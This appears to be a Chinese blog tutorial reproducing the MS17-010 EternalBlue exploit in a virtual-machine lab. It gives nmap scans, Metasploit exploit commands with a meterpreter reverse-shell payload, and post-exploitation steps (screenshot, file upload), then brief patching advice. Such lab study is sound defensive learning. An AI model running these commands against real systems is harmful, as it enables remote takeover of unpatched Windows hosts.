MS17-010永恒之蓝漏洞复现

复现MS17-010永恒之蓝

永恒之蓝介绍

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
漏洞原理:

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
影响版本:

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

环境
  • 攻击机:Kali-Linux-2021 虚拟机 IP:192.168.134.128
  • 靶机:Windows7 虚拟机 IP:192.168.134.121
使用工具
  • Nmap 网络扫描工具
  • Metasploit 渗透框架,能获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具
开始复现
  • 登录管理员账号
    在这里插入图片描述
namp -T4 -A -v -Pn 192.168.134.0/24  

在这里插入图片描述

  • 成功发现192.168.134.121

在这里插入图片描述

namp -T4 -A -v -Pn 192.168.134.121  //扫描此段ip开放端口

在这里插入图片描述

  • 发现445端口开放
    在这里插入图片描述

  • 通过命令启动Metasploit

msfconsole

在这里插入图片描述

  • 搜索ms17-010有关模块

在这里插入图片描述

  • exploit是攻击模块,auxiliary是辅助模块,这里我们先选用3辅助扫描模块,来确定漏洞是否存在
  • 然后查看该模块需要修改的参数
use 3
show options

在这里插入图片描述

required中yes选项是必须要填的,可以看到缺少了RHOSTS

  • 设置目标

在这里插入图片描述

  • 查看确认已更改

在这里插入图片描述

run  //运行扫描模块

在这里插入图片描述

use 0  //运行攻击模块

在这里插入图片描述

show options  //查看参数信息

在这里插入图片描述

  • 设置攻击载荷,这里默认为windows/x64/meterpreter/reverse_tcp,然后设置目标IP,攻击者IP
set payload windows/x64/meterpreter/reverse_tcp   
set rhosts 192.168.134.121         //目标机
set lhost 192.168.134.128          //攻击机

在这里插入图片描述

run  //开始攻击

在这里插入图片描述

运行成功可以开始攻击了

getuid //查看目标机权限
screenshot //拍摄一张桌面照
  • 拍摄成功并保存到了桌面1

在这里插入图片描述

  • 尝试把保存下来的照片发送到目标机
upload 本地照片位置  目标位置

在这里插入图片描述

  • 运行成功打开目标机查看,发现照片
    在这里插入图片描述
修复方法
  • 关闭bios服务,或开启防火墙,屏蔽服务端口

  • 给系统打上永恒之蓝的漏洞修复补丁

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值